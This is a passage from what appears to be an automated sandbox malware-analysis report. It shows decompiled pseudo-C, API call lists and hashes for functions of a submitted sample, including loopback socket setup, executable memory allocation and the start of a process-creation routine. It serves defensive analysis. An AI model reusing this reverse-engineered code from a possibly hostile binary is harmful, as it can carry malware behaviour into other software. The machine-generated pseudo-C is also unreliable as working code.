					_t14 =  *((intOrPtr*)(_t25 + 0x14));
					 *((intOrPtr*)(_t19 + 0x14)) = _t14;
				}
				_t20 =  *((intOrPtr*)(_t25 + 0x14));
				if(_t20 != 0) {
					_t14 =  *((intOrPtr*)(_t25 + 0x18));
					 *((intOrPtr*)(_t20 + 0x18)) = _t14;
				}
				 *((intOrPtr*)(_t25 + 0x14)) = 0;
				 *((intOrPtr*)(_t25 + 0x18)) = 0;
				LeaveCriticalSection(_t16);
				return _t14;
			}

0x004046f6
0x004046f9
0x004046fe
0x00404700
0x00404705
0x00404709
0x00404712
0x00404714
0x00404717
0x00404717
0x0040471a
0x0040471f
0x00404721
0x00404724
0x00404724
0x00404727
0x0040472c
0x0040472e
0x00404731
0x00404731
0x00404735
0x0040473c
0x00404743
0x0040474f

APIs

Part of subcall function 00405400: EnterCriticalSection.KERNEL32(00000018,149E0ABF,?,?), ref: 0040544E
Part of subcall function 00405400: LeaveCriticalSection.KERNEL32(00000018), ref: 0040547C

EnterCriticalSection.KERNEL32(?,?), ref: 00404709
LeaveCriticalSection.KERNEL32(?), ref: 00404743

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 8134eb5177c17737996b8cfa7baa74c7b946218b50a3147e76997d197ee23e2a
Instruction ID: e474e608e337d73c752e4bc156cf06f9492ea00fe079e7f60bde750c78b21cdd
Opcode Fuzzy Hash: 8134eb5177c17737996b8cfa7baa74c7b946218b50a3147e76997d197ee23e2a
Instruction Fuzzy Hash: 0C014BB5201B009BC734CF19D884AA7B7F8EF88726B10062EE54683A41D734E945CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004010B0 Relevance: 1.5, APIs: 1, Instructions: 27networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 004010F0

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 2eac16178b4f64804d9b8047fbcbab85d36cd26c240b9783a103ab1bf4eab220
Instruction ID: 4fbdb3fa6f1eab1a4d6906cf49c72293e199c16c96f5b2754e81022b73820bf6
Opcode Fuzzy Hash: 2eac16178b4f64804d9b8047fbcbab85d36cd26c240b9783a103ab1bf4eab220
Instruction Fuzzy Hash: 6FF0A0719002004BE320AB68DD037E973A8DB49314F40453BA969C62D0FB3468528B8B

Uniqueness

Uniqueness Score: -1.00%

Function 00722385 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007223D6

Memory Dump Source

Source File: 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp, Offset: 00721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_721000_xw0K5Lahxz.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a8c44092097df5f3550718fd7fcbc1ebffb5b1f17bf18c868a0224c4c8711ac0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AB112C79A00208EFDB01DF98C985E98BBF5AF08350F158094F9489B362D775EA50DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00425443 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00426310), ref: 0042544B

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: ea8c1701e18b5368b8d5e9497c8ae566300893ec9029309250aa1ce50f7697d7
Instruction ID: 3d24849212dde93e963f903a888d417dcfbe0b6a214b278ed9435d9b88fa3be2
Opcode Fuzzy Hash: ea8c1701e18b5368b8d5e9497c8ae566300893ec9029309250aa1ce50f7697d7
Instruction Fuzzy Hash: 36B01274442200DFE7440FA0BC447043F20A70A703F000131E208541B0D77000409B09

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004034F0 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 439
networkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E004034F0(void* __ebx, signed int* __ecx, void* __edi) {
				char _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v48;
				short _v50;
				char _v52;
				char _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed int* _v72;
				char _v76;
				signed int _v288;
				intOrPtr _v292;
				char _v296;
				char _v297;
				void* __esi;
				void* __ebp;
				signed int _t117;
				signed int _t118;
				char _t120;
				signed int _t121;
				signed int _t122;
				char* _t123;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t151;
				void* _t154;
				signed int* _t156;
				void* _t159;
				char* _t161;
				signed int _t164;
				intOrPtr _t166;
				signed int _t170;
				signed int _t171;
				signed int _t176;
				signed int _t181;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t206;
				intOrPtr* _t222;
				char _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				void* _t246;
				signed int _t252;
				void* _t253;
				intOrPtr* _t255;
				void* _t256;
				signed int _t257;
				void* _t259;
				void* _t260;
				signed int _t261;
				signed int _t263;

				_t260 = _t259 - 0x3c;
				_t117 =  *0x41b014; // 0x149e0abf
				_t118 = _t117 ^ _t257;
				_v20 = _t118;
				 *[fs:0x0] =  &_v16;
				_v72 = __ecx;
				_t120 = E00412970();
				__imp__#112(0, _t118, __edi, _t246, __ebx,  *[fs:0x0], 0x413d1d, 0xffffffff);
				__imp__WSASocketW(2, 1, 6, 0, 0, 1);
				_t241 = _t120;
				_t121 = E00412970();
				__imp__#111();
				_v24 = _t121;
				_v28 = _t121;
				if(_t241 != 0xffffffff) {
					_t122 = E00412970();
					_v28 = 0;
					_v24 = _t122;
				} else {
					_t241 = _t241;
				}
				_v76 = _t241;
				_v8 = 0;
				if(_t241 != 0xffffffff) {
					L5:
					_v36 = 1;
					if(_t241 != 0xffffffff) {
						__imp__#112(0);
						_t123 =  &_v36;
						__imp__#21(_t241, 0xffff, 4, _t123, 4);
						E00412970();
						__imp__#111();
						if(_t123 != 0) {
							_t203 = __imp__#8;
							asm("xorps xmm0, xmm0");
							_v68 = 0x10;
							asm("movlpd [ebp-0x28], xmm0");
							_v52 = 2;
							_v48 =  *_t203(0x7f000001);
							_v50 = 0;
							if(_t241 != 0xffffffff) {
								goto L9;
							} else {
								goto L18;
							}
						} else {
							E00412970();
							_t203 = __imp__#8;
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_v52 = 2;
							_v48 =  *_t203(0x7f000001);
							_v50 = 0;
							_v68 = 0x10;
							L9:
							__imp__#112(0);
							_t128 =  &_v52;
							__imp__#2(_t241, _t128, 0x10);
							_v64 = _t128;
							_t129 = E00412970();
							__imp__#111();
							_v24 = _t129;
							_t130 = _v64;
							_v28 = _t129;
							if(_t130 != 0) {
								if(_t130 != 0xffffffff) {
									goto L11;
								} else {
									goto L20;
								}
							} else {
								E00412970();
								goto L11;
							}
						}
					} else {
						E00412970();
						_t205 = __imp__#8;
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_v52 = 2;
						_v48 =  *__imp__#8(0x7f000001);
						_v50 = 0;
						_v68 = 0x10;
						L18:
						_v24 = E00412970();
						_v28 = 0x2719;
						L20:
						_t187 =  ==  ? 0 : E00401790;
						_t270 =  ==  ? 0 : E00401790;
						if(( ==  ? 0 : E00401790) != 0) {
							goto L60;
						} else {
							if(_t241 != 0xffffffff) {
								L11:
								__imp__#112(0);
								_v32 = 0x10;
								_t132 =  &_v52;
								__imp__#6(_t241, _t132,  &_v32);
								_v64 = _t132;
								_v68 = _v32;
								_t134 = E00412970();
								_t250 = _t134;
								__imp__#111();
								_v24 = _t134;
								_t135 = _v64;
								_v28 = _t134;
								if(_t135 != 0) {
									if(_t135 != 0xffffffff) {
										goto L25;
									} else {
										goto L24;
									}
								} else {
									E00412970();
									_v48 =  *_t203(0x7f000001);
									goto L13;
								}
							} else {
								_v24 = E00412970();
								_v28 = 0x2719;
								L24:
								_t183 =  ==  ? 0 : E00401790;
								_t273 =  ==  ? 0 : E00401790;
								if(( ==  ? 0 : E00401790) != 0) {
									goto L60;
								} else {
									L25:
									_v48 =  *_t203(0x7f000001);
									if(_t241 != 0xffffffff) {
										L13:
										_t204 = __imp__#112;
										_t137 =  *_t204(0);
										__imp__#13(_t241, 0x7fffffff);
										_v64 = _t137;
										_t138 = E00412970();
										_t250 = _t138;
										__imp__#111();
										_v24 = _t138;
										_t139 = _v64;
										_v28 = _t138;
										if(_t139 != 0) {
											if(_t139 != 0xffffffff) {
												goto L15;
											} else {
												goto L28;
											}
										} else {
											E00412970();
											goto L15;
										}
									} else {
										_t181 = E00412970();
										_t205 = __imp__#112;
										_v28 = 0x2719;
										_v24 = _t181;
										L28:
										_t178 =  ==  ? 0 : E00401790;
										_t276 =  ==  ? 0 : E00401790;
										if(( ==  ? 0 : E00401790) != 0) {
											goto L60;
										} else {
											L15:
											_t140 =  *_t204(0);
											__imp__WSASocketW(2, 1, 6, 0, 0, 1);
											_t205 = _t140;
											_v32 = _t205;
											_t141 = E00412970();
											_t251 = _t141;
											__imp__#111();
											_v24 = _t141;
											_v28 = _t141;
											if(_t205 != 0xffffffff) {
												_v24 = E00412970();
												_v28 = 0;
											} else {
												_t205 = _t205;
												_v32 = _t205;
											}
											_v64 = _t205;
											_v8 = 1;
											if(_t205 != 0xffffffff) {
												__imp__#112(0);
												_t143 =  &_v52;
												__imp__#4(_t205, _t143, _v68);
												_t205 = _t143;
												_t144 = E00412970();
												_t251 = _t144;
												__imp__#111();
												_v24 = _t144;
												_t212 = _t144;
												_v28 = _t144;
												if(_t205 != 0) {
													if(_t205 != 0xffffffff) {
														goto L36;
													} else {
														goto L39;
													}
												} else {
													_t144 = E00412970();
													goto L36;
												}
											} else {
												_t175 =  ==  ? 0 : E00401790;
												_t280 =  ==  ? 0 : E00401790;
												if(( ==  ? 0 : E00401790) != 0) {
													goto L61;
												} else {
													_t176 = E00412970();
													_t212 = 0x2719;
													_v24 = _t176;
													_v28 = 0x2719;
													L39:
													_t144 =  ==  ? 0 : E00401790;
													if(E00401790 != 0) {
														goto L61;
													} else {
														L36:
														if(_t241 != 0xffffffff) {
															__imp__#112(0);
															__imp__#1(_t241, 0, 0);
															_t205 = _t144;
															_t145 = E00412970();
															_t252 = _t145;
															__imp__#111();
															_v24 = _t252;
															_t242 = _t145;
															_v28 = _t242;
															if(_t205 != 0xffffffff) {
																_t242 = 0;
																_t146 = E00412970();
																goto L44;
															} else {
																_t205 = _t205;
															}
														} else {
															_t146 = E00412970();
															_t242 = 0x2719;
															_t205 = _t205 | 0xffffffff;
															L44:
															_v24 = _t146;
															_v28 = _t242;
														}
														_v68 = _t205;
														_v8 = 2;
														if(_t205 != 0xffffffff || _t242 == 0) {
															_t243 = _v32;
															_v56 = 1;
															_v57 = 0;
															_t213 = _t243;
															_t149 = E004032D0(_t243,  &_v57, _t212,  &_v56,  &_v28);
															_t261 = _t260 + 0xc;
															if(_t149 == 0 || _v28 == 0) {
																_v36 = 1;
																if(_t243 != 0xffffffff) {
																	__imp__#112(0);
																	_t150 =  &_v36;
																	__imp__#21(_t243, 6, 1, _t150, 4);
																	_t244 = _t150;
																	_t151 = E00412970();
																	_t252 = _t151;
																	__imp__#111();
																	_v28 = _t151;
																	_v24 = _t252;
																	if(_t244 == 0) {
																		_t170 = E00412970();
																		_v28 = _t244;
																		_v24 = _t170;
																	}
																	_t243 = _v32;
																} else {
																	_t171 = E00412970();
																	_v28 = 0x2719;
																	_v24 = _t171;
																}
																_v56 = 1;
																_v57 = 0;
																_t231 =  &_v57;
																_t154 = E004032D0(_t205,  &_v57, _t213,  &_v56,  &_v28);
																_t261 = _t261 + 0xc;
																if(_t154 == 0 || _v28 == 0) {
																	_v36 = 1;
																	if(_t205 == 0xffffffff) {
																		L58:
																		E00412970();
																	} else {
																		__imp__#112(0);
																		_t161 =  &_v36;
																		__imp__#21(_t205, 6, 1, _t161, 4);
																		E00412970();
																		__imp__#111();
																		if(_t161 == 0) {
																			goto L58;
																		}
																	}
																	_t156 = _v72;
																	_v68 = 0xffffffff;
																	_v64 = 0xffffffff;
																	 *_t156 = _t205;
																	_t156[1] = _t243;
																	E00403490(_t205,  &_v68, _t243);
																	E00403490(_t205,  &_v64, _t243);
																	_t159 = E00403490(_t205,  &_v76, _t243);
																	 *[fs:0x0] = _v16;
																	_pop(_t245);
																	_pop(_t253);
																	_pop(_t206);
																	return E00412A1E(_t159, _t206, _v20 ^ _t257, _t231, _t245, _t253);
																} else {
																	goto L62;
																}
															} else {
																goto L62;
															}
														} else {
															goto L62;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t200 =  ==  ? 0 : E00401790;
					_t267 =  ==  ? 0 : E00401790;
					if(( ==  ? 0 : E00401790) != 0) {
						L60:
						E00401CE0( &_v28, "socket_select_interrupter", _t241, _t250);
						L61:
						E00401CE0( &_v28, "socket_select_interrupter", _t241, _t251);
						L62:
						_t232 = "socket_select_interrupter";
						_t222 =  &_v28;
						E00401CE0(_t222, "socket_select_interrupter", _t243, _t252);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t257);
						_t263 = (_t261 & 0xfffffff8) - 0x14;
						_t164 =  *0x41b014; // 0x149e0abf
						_v288 = _t164 ^ _t263;
						_push(_t252);
						_t255 = _t222;
						_v296 = 0;
						_t166 = E00412970();
						_t223 =  *_t255;
						_v292 = _t166;
						_v297 = 2;
						if( *_t255 != 0xffffffff) {
							_t232 =  &_v297;
							_t166 = E00402FB0(_t223,  &_v297, 1,  &_v296);
							_t263 = _t263 + 8;
						}
						_t224 =  *((intOrPtr*)(_t255 + 4));
						if( *((intOrPtr*)(_t255 + 4)) != 0xffffffff) {
							_t232 =  &_v297;
							_t166 = E00402FB0(_t224,  &_v297, 1,  &_v296);
							_t263 = _t263 + 8;
						}
						_pop(_t256);
						return E00412A1E(_t166, _t205, _v288 ^ _t263, _t232, _t243, _t256);
					} else {
						goto L5;
					}
				}
			}

0x00403501
0x00403504
0x00403509
0x0040350b
0x00403515
0x0040351b
0x0040351e
0x00403525
0x00403537
0x0040353d
0x0040353f
0x00403546
0x0040354c
0x00403551
0x00403557
0x0040355f
0x00403564
0x00403567
0x00403559
0x00403559
0x00403559
0x0040356a
0x0040356d
0x00403577
0x0040358d
0x0040358d
0x00403597
0x004035d3
0x004035db
0x004035e7
0x004035ef
0x004035f4
0x004035fc
0x00403749
0x0040374f
0x00403757
0x00403763
0x00403768
0x0040376e
0x00403773
0x0040377a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403602
0x00403602
0x00403607
0x0040360d
0x00403615
0x0040361f
0x00403625
0x0040362a
0x0040362e
0x00403635
0x00403637
0x0040363f
0x00403644
0x0040364a
0x0040364d
0x00403654
0x0040365c
0x0040365f
0x00403662
0x00403667
0x00403795
0x00000000
0x00000000
0x00000000
0x00000000
0x0040366d
0x0040366d
0x00000000
0x0040366d
0x00403667
0x00403599
0x00403599
0x0040359e
0x004035a4
0x004035ac
0x004035b6
0x004035bc
0x004035c1
0x004035c5
0x00403780
0x0040378a
0x0040378d
0x0040379b
0x004037a4
0x004037a7
0x004037a9
0x00000000
0x004037af
0x004037b2
0x00403672
0x00403674
0x0040367d
0x00403685
0x0040368a
0x00403690
0x00403696
0x00403699
0x0040369e
0x004036a0
0x004036a8
0x004036ab
0x004036ae
0x004036b3
0x004037cd
0x00000000
0x00000000
0x00000000
0x00000000
0x004036b9
0x004036b9
0x004036c5
0x00000000
0x004036c5
0x004037b8
0x004037c2
0x004037c5
0x004037cf
0x004037d8
0x004037db
0x004037dd
0x00000000
0x004037e3
0x004037e3
0x004037ea
0x004037f0
0x004036c8
0x004036c8
0x004036d0
0x004036d8
0x004036de
0x004036e1
0x004036e6
0x004036e8
0x004036f0
0x004036f3
0x004036f6
0x004036fb
0x00403811
0x00000000
0x00000000
0x00000000
0x00000000
0x00403701
0x00403701
0x00000000
0x00403701
0x004037f6
0x004037f6
0x004037fb
0x00403806
0x00403809
0x00403817
0x00403820
0x00403823
0x00403825
0x00000000
0x0040382b
0x00403706
0x00403708
0x00403716
0x0040371c
0x0040371e
0x00403721
0x00403726
0x00403728
0x0040372e
0x00403733
0x00403739
0x00403837
0x0040383a
0x0040373f
0x0040373f
0x00403741
0x00403741
0x0040383d
0x00403840
0x00403847
0x00403871
0x0040387a
0x0040387f
0x00403885
0x00403887
0x0040388c
0x0040388e
0x00403894
0x00403897
0x00403899
0x0040389e
0x004038bc
0x00000000
0x00000000
0x00000000
0x00000000
0x004038a0
0x004038a0
0x00000000
0x004038a0
0x00403849
0x00403852
0x00403855
0x00403857
0x00000000
0x0040385d
0x0040385d
0x00403862
0x00403867
0x0040386a
0x004038be
0x004038c7
0x004038cc
0x00000000
0x004038d2
0x004038a5
0x004038a8
0x004038d6
0x004038e1
0x004038e7
0x004038e9
0x004038ee
0x004038f0
0x004038f6
0x004038f9
0x004038fb
0x00403901
0x00403907
0x00403909
0x00000000
0x00403903
0x00403903
0x00403903
0x004038aa
0x004038aa
0x004038af
0x004038b4
0x0040390e
0x0040390e
0x00403911
0x00403911
0x00403914
0x00403917
0x0040391e
0x00403928
0x00403932
0x0040393e
0x00403942
0x00403944
0x00403949
0x0040394e
0x0040395a
0x00403964
0x00403979
0x00403981
0x0040398a
0x00403990
0x00403992
0x00403997
0x00403999
0x0040399f
0x004039a2
0x004039a7
0x004039a9
0x004039ae
0x004039b1
0x004039b1
0x004039b4
0x00403966
0x00403966
0x0040396b
0x00403972
0x00403972
0x004039ba
0x004039c5
0x004039cb
0x004039d0
0x004039d5
0x004039da
0x004039e6
0x004039f0
0x00403a1c
0x00403a1c
0x004039f2
0x004039f4
0x004039fc
0x00403a05
0x00403a0d
0x00403a12
0x00403a1a
0x00000000
0x00000000
0x00403a1a
0x00403a21
0x00403a27
0x00403a2e
0x00403a35
0x00403a37
0x00403a3a
0x00403a42
0x00403a4a
0x00403a52
0x00403a5a
0x00403a5b
0x00403a5c
0x00403a6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040391e
0x004038cc
0x00403857
0x00403847
0x00403825
0x004037f0
0x004037dd
0x004037b2
0x004037a9
0x00403579
0x00403582
0x00403585
0x00403587
0x00403a6b
0x00403a73
0x00403a78
0x00403a80
0x00403a85
0x00403a85
0x00403a8a
0x00403a8d
0x00403a92
0x00403a93
0x00403a94
0x00403a95
0x00403a96
0x00403a97
0x00403a98
0x00403a99
0x00403a9a
0x00403a9b
0x00403a9c
0x00403a9d
0x00403a9e
0x00403a9f
0x00403ab0
0x00403ab6
0x00403ab9
0x00403ac0
0x00403ac4
0x00403ac5
0x00403ac7
0x00403acf
0x00403ad4
0x00403ad6
0x00403ada
0x00403ae2
0x00403aeb
0x00403aef
0x00403af4
0x00403af4
0x00403af7
0x00403afd
0x00403b06
0x00403b0a
0x00403b0f
0x00403b0f
0x00403b16
0x00403b21
0x00000000
0x00000000
0x00000000
0x00403587

APIs

WSASetLastError.WS2_32(00000000,149E0ABF), ref: 00403525
WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 00403537
WSAGetLastError.WS2_32 ref: 00403546
htonl.WS2_32(7F000001), ref: 004035BA
WSASetLastError.WS2_32(00000000), ref: 004035D3
setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 004035E7
WSAGetLastError.WS2_32 ref: 004035F4
htonl.WS2_32(7F000001), ref: 00403623
WSASetLastError.WS2_32(00000000), ref: 00403637
bind.WS2_32(00000000,?,00000010), ref: 00403644
WSAGetLastError.WS2_32 ref: 00403654
WSASetLastError.WS2_32(00000000), ref: 00403674
getsockname.WS2_32(00000000,?,?), ref: 0040368A
WSAGetLastError.WS2_32 ref: 004036A0
htonl.WS2_32(7F000001), ref: 004036C3
WSASetLastError.WS2_32(00000000), ref: 004036D0
listen.WS2_32(00000000,7FFFFFFF), ref: 004036D8
WSAGetLastError.WS2_32 ref: 004036E8
WSASetLastError.WS2_32(00000000), ref: 00403708
WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 00403716
WSAGetLastError.WS2_32 ref: 00403728
htonl.WS2_32(7F000001), ref: 0040376C
htonl.WS2_32(7F000001), ref: 004037E8
WSASetLastError.WS2_32(00000000), ref: 00403871
connect.WS2_32(00000000,?,00000010), ref: 0040387F
WSAGetLastError.WS2_32 ref: 0040388E
WSASetLastError.WS2_32(00000000), ref: 004038D6
accept.WS2_32(00000000,00000000,00000000), ref: 004038E1
WSAGetLastError.WS2_32 ref: 004038F0
WSASetLastError.WS2_32(00000000), ref: 00403979
setsockopt.WS2_32(00000010,00000006,00000001,00000001,00000004), ref: 0040398A
WSAGetLastError.WS2_32 ref: 00403999
WSASetLastError.WS2_32(00000000), ref: 004039F4
setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 00403A05
WSAGetLastError.WS2_32 ref: 00403A12

Strings

socket_select_interrupter, xrefs: 00403A6B, 00403A78, 00403A85

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: ErrorLast$htonl$setsockopt$Socket$acceptbindconnectgetsocknamelisten
String ID: socket_select_interrupter
API String ID: 2604702310-3103927870
Opcode ID: 90b846d53b770dcbb63ad18a44c33c37396614e6c2ea0119f7c0443ddb2f3b42
Instruction ID: 80e713c1e53bca414bd12160691ab8d52efdebf9a1259828d15b0f8e0f730388
Opcode Fuzzy Hash: 90b846d53b770dcbb63ad18a44c33c37396614e6c2ea0119f7c0443ddb2f3b42
Instruction Fuzzy Hash: 02F171B1E106059ADB10EFB9D8857EEBAB8AF44315F10423BF911F72D0D7B84A418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC0 Relevance: 17.2, APIs: 6, Strings: 3, Instructions: 1451
processCOMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E00406DC0() {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				short _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				struct _SECURITY_ATTRIBUTES* _v608;
				struct _SECURITY_ATTRIBUTES* _v632;
				struct _SECURITY_ATTRIBUTES* _v636;
				struct _SECURITY_ATTRIBUTES* _v652;
				struct _SECURITY_ATTRIBUTES* _v656;
				struct _SECURITY_ATTRIBUTES* _v660;
				struct _SECURITY_ATTRIBUTES* _v676;
				struct _SECURITY_ATTRIBUTES* _v680;
				struct _SECURITY_ATTRIBUTES* _v684;
				struct _SECURITY_ATTRIBUTES* _v700;
				signed int _v704;
				struct _SECURITY_ATTRIBUTES* _v708;
				struct _SECURITY_ATTRIBUTES* _v724;
				signed int _v728;
				struct _SECURITY_ATTRIBUTES* _v732;
				short _v748;
				signed int _v752;
				signed int _v756;
				char _v772;
				struct _PROCESS_INFORMATION _v788;
				void* _v860;
				void _v916;
				void* _v932;
				char _v940;
				void* _v948;
				char _v964;
				struct _STARTUPINFOW _v1036;
				char _v1208;
				char _v1212;
				void* _v1284;
				char _v1300;
				char _v1316;
				char _v2540;
				char _v2541;
				char _v2542;
				signed int _v2544;
				char _v2546;
				signed int _v2548;
				signed int _v2552;
				short _v2556;
				char _v2558;
				struct _SECURITY_ATTRIBUTES** _v2560;
				signed int _v2564;
				struct _SECURITY_ATTRIBUTES* _v2568;
				char _v2580;
				struct _SECURITY_ATTRIBUTES* _v2584;
				char _v2588;
				char _v2592;
				char _v2598;
				short _v2600;
				char _v2604;
				intOrPtr _v2608;
				char _v2616;
				char _v2632;
				intOrPtr _v2636;
				char _v2660;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t533;
				signed int _t534;
				signed int _t541;
				char _t542;
				intOrPtr _t553;
				char _t554;
				char _t555;
				void* _t560;
				void* _t561;
				signed int _t563;
				char _t564;
				char _t569;
				short _t570;
				char _t571;
				void* _t576;
				void* _t577;
				void* _t578;
				signed int _t580;
				intOrPtr _t582;
				signed char _t592;
				intOrPtr* _t596;
				struct _SECURITY_ATTRIBUTES* _t607;
				char* _t611;
				intOrPtr _t625;
				signed int _t627;
				signed int _t630;
				void* _t636;
				void* _t644;
				intOrPtr _t647;
				signed int _t652;
				void* _t654;
				intOrPtr _t665;
				intOrPtr _t667;
				struct _SECURITY_ATTRIBUTES* _t669;
				struct _SECURITY_ATTRIBUTES* _t671;
				intOrPtr _t674;
				struct _SECURITY_ATTRIBUTES* _t677;
				struct _SECURITY_ATTRIBUTES* _t685;
				signed int _t689;
				void* _t694;
				void* _t701;
				intOrPtr _t702;
				struct _SECURITY_ATTRIBUTES* _t714;
				intOrPtr _t717;
				signed int _t720;
				intOrPtr _t721;
				signed int _t722;
				signed int _t723;
				struct _SECURITY_ATTRIBUTES* _t730;
				signed int _t735;
				short _t736;
				void* _t737;
				void* _t746;
				void* _t751;
				void* _t756;
				intOrPtr _t762;
				void* _t765;
				signed int _t809;
				intOrPtr* _t818;
				signed int _t824;
				intOrPtr* _t831;
				intOrPtr _t850;
				intOrPtr _t851;
				char _t852;
				struct _SECURITY_ATTRIBUTES* _t853;
				struct _SECURITY_ATTRIBUTES* _t854;
				intOrPtr _t855;
				struct _SECURITY_ATTRIBUTES* _t856;
				struct _SECURITY_ATTRIBUTES* _t859;
				struct _SECURITY_ATTRIBUTES* _t860;
				signed int _t861;
				signed int _t862;
				signed int _t864;
				struct _SECURITY_ATTRIBUTES* _t866;
				struct _SECURITY_ATTRIBUTES* _t867;
				DWORD* _t868;
				void* _t869;
				intOrPtr* _t871;
				struct _SECURITY_ATTRIBUTES* _t875;
				intOrPtr* _t898;
				signed int _t902;
				signed int _t905;
				signed int _t906;
				signed int _t909;
				signed int _t914;
				signed int _t917;
				signed int _t918;
				signed int _t921;
				DWORD* _t931;
				signed int _t932;
				struct _SECURITY_ATTRIBUTES* _t933;
				signed int _t935;
				void* _t938;
				signed int _t941;
				signed int _t944;
				signed int _t945;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				struct _SECURITY_ATTRIBUTES* _t955;
				signed int _t956;
				struct _SECURITY_ATTRIBUTES* _t957;
				long* _t958;
				DWORD* _t959;
				void* _t960;
				DWORD* _t961;
				void* _t962;
				void* _t963;
				void* _t964;
				void* _t965;
				void* _t966;
				signed int _t968;
				void* _t970;
				void* _t971;
				intOrPtr* _t972;
				signed int _t974;
				struct _SECURITY_ATTRIBUTES** _t977;
				struct _SECURITY_ATTRIBUTES* _t978;
				DWORD* _t979;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t996;
				signed int _t997;
				signed int _t1000;
				void* _t1001;
				void* _t1002;
				struct _SECURITY_ATTRIBUTES* _t1004;
				signed char* _t1005;
				struct _SECURITY_ATTRIBUTES* _t1009;
				void* _t1010;
				char _t1011;
				void* _t1013;
				signed int _t1014;
				struct _SECURITY_ATTRIBUTES* _t1017;
				void* _t1018;
				signed int _t1020;
				signed int _t1022;
				void* _t1024;
				WCHAR* _t1025;
				void* _t1026;
				void* _t1028;
				struct _SECURITY_ATTRIBUTES* _t1029;
				void* _t1030;
				signed int _t1033;
				void* _t1035;
				signed int _t1038;
				void* _t1039;
				void* _t1040;
				void* _t1041;
				void* _t1042;
				void* _t1043;
				void* _t1044;
				void* _t1045;
				void* _t1046;
				void* _t1047;
				void* _t1048;
				void* _t1049;

				_t765 = _t1035;
				_t1038 = (_t1035 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t765 + 4));
				_t1033 = _t1038;
				_push(0xffffffff);
				_push(0x414172);
				_push( *[fs:0x0]);
				_push(_t765);
				_t1039 = _t1038 - 0xa48;
				_t533 =  *0x41b014; // 0x149e0abf
